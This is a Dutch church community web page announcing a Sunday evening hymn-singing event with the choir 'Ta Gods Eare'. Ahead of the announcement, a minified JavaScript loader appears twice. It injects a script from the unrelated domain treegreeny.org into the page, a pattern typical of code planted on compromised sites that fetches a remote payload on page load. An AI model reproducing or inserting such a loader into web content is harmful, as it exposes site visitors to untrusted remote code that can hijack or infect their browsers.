;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zondagavondzang 11 februari - PKN Damwâld

Zondagavondzang 11 februari

Gepubliceerd op: donderdag 11 januari

Op zondag 11 februari om 19.30 uur is er een zondagavondzang in de “Ontmoeting”,  Aan deze avond wordt medewerking verleend door het chr. gemengd koor “Ta Gods Eare” van Broeksterwâld, o.l.v. dirigent Anne Jaap Soldaat en m.m.v. pianist Ronald Postema.

Dit koor is een paar jaar na de Tweede Wereldoorlog opgericht om de jeugd van de straat te houden. In juni 2023 bestond “Ta Gods Eare” 75 jaar, wat ze met een mooie avond vol zang en verhalen hebben gevierd.

Het koor zingt op 11 februari ruimschoots uit haar eigen repertoire, maar er is ook volop ruimte voor samenzang van mooie liederen, zoals o.a. “Vreugde, vreugde, louter vreugde”.

U bent allen van harte uitgenodigd voor deze zondagavondzang met dit bijzondere koor uit ons buurdorp. De toegang is gratis, er is wel een collecte.